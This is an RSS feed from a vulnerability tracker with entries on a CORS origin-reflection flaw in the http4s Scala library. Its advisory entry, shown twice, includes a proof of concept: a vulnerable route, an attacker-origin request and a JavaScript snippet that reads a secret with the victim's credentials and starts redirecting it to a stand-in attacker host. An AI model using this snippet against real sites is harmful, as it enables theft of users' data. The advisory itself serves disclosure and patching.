<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 04 Oct 2026 23:23:38 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-30486</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-30486</link>
      <description>EUVD-2026-30486</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-30486</guid>
    </item>
    <item>
      <title>fkie_cve-2021-39185</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2021-39185</link>
      <description>&lt;p&gt;Http4s is a minimal, idiomatic Scala interface for HTTP services. In http4s versions 0.21.26 and prior, 0.22.0 through 0.22.2, 0.23.0, 0.23.1, and 1.0.0-M1 through 1.0.0-M24, the default CORS configuration is vulnerable to an origin reflection attack. The middleware is also susceptible to a Null Origin Attack. The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. See the GitHub GHSA for more information, including code examples and workarounds.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Http4s is a minimal, idiomatic Scala interface for HTTP services. In http4s versions 0.21.26 and prior, 0.22.0 through 0.22.2, 0.23.0, 0.23.1, and 1.0.0-M1 through 1.0.0-M24, the default CORS configuration is vulnerable to an origin reflection attack. The middleware is also susceptible to a Null Origin Attack. The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. See the GitHub GHSA for more information, including code examples and workarounds.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2021-39185</guid>
    </item>
    <item>
      <title>GHSA-52cf-226f-rhr6 — Default CORS config allows any origin with credentials</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-52cf-226f-rhr6</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: org.http4s:http4s-server_2.13.0-M5, Maven: org.http4s:http4s-server_3, Maven: org.http4s:http4s-server_2.10, Maven: org.http4s:http4s-server_2.11, Maven: org.http4s:http4s-server_2.12, Maven: org.http4s:http4s-server_2.13&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;#### Origin reflection attack&lt;/p&gt;
&lt;p&gt;The default CORS configuration is vulnerable to an origin reflection attack.  Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:&lt;/p&gt;
&lt;p&gt;```scala
val routes: HttpRoutes[F] = HttpRoutes.of {
  case req if req.pathInfo === &amp;#34;/secret&amp;#34; =&amp;gt;
    Response(Ok).withEntity(password).pure[F]
}
val app = CORS(routes.orNotFound)
```&lt;/p&gt;
&lt;p&gt;The following request is made to our server:&lt;/p&gt;
&lt;p&gt;```http
GET /secret HTTP/1.1
Host: vulnerable.example.com
Origin: https://adversary.example.net
Cookie: sessionId=...
```&lt;/p&gt;
&lt;p&gt;When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting.  Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:&lt;/p&gt;
&lt;p&gt;```http
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://adversary.example.org
Access-Control-Allow-Credentials: true 
Content-Type: text/plain&lt;/p&gt;
&lt;p&gt;p4ssw0rd
```&lt;/p&gt;
&lt;p&gt;A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user&amp;#39;s credentials to `vulnerable.exmaple.org`:&lt;/p&gt;
&lt;p&gt;```javascript
var req = new XMLHttpRequest(); 
req.onload = reqListener; 
req.open(&amp;#39;get&amp;#39;,&amp;#39;https://vulnerable.example.org/secret&amp;#39;,true); 
req.withCredentials = true;
req.send();&lt;/p&gt;
&lt;p&gt;function reqListener() {
    location=&amp;#39;//bad-people.e…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: org.http4s:http4s-server_2.13.0-M5, Maven: org.http4s:http4s-server_3, Maven: org.http4s:http4s-server_2.10, Maven: org.http4s:http4s-server_2.11, Maven: org.http4s:http4s-server_2.12, Maven: org.http4s:http4s-server_2.13&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;#### Origin reflection attack&lt;/p&gt;
&lt;p&gt;The default CORS configuration is vulnerable to an origin reflection attack.  Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:&lt;/p&gt;
&lt;p&gt;```scala
val routes: HttpRoutes[F] = HttpRoutes.of {
  case req if req.pathInfo === &amp;#34;/secret&amp;#34; =&amp;gt;
    Response(Ok).withEntity(password).pure[F]
}
val app = CORS(routes.orNotFound)
```&lt;/p&gt;
&lt;p&gt;The following request is made to our server:&lt;/p&gt;
&lt;p&gt;```http
GET /secret HTTP/1.1
Host: vulnerable.example.com
Origin: https://adversary.example.net
Cookie: sessionId=...
```&lt;/p&gt;
&lt;p&gt;When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting.  Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:&lt;/p&gt;
&lt;p&gt;```http
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://adversary.example.org
Access-Control-Allow-Credentials: true 
Content-Type: text/plain&lt;/p&gt;
&lt;p&gt;p4ssw0rd
```&lt;/p&gt;
&lt;p&gt;A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user&amp;#39;s credentials to `vulnerable.exmaple.org`:&lt;/p&gt;
&lt;p&gt;```javascript
var req = new XMLHttpRequest(); 
req.onload = reqListener; 
req.open(&amp;#39;get&amp;#39;,&amp;#39;https://vulnerable.example.org/secret&amp;#39;,true); 
req.withCredentials = true;
req.send();&lt;/p&gt;
&lt;p&gt;function reqListener() {
    location=&amp;#39;//bad-people.e…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-52cf-226f-rhr6</guid>
    </item>
    <item>
      <title>gsd-2021-39185</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2021-39185</link>
      <description>gsd-2021-39185</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2021-39185</guid>
    </item>
  </channel>
</rss>
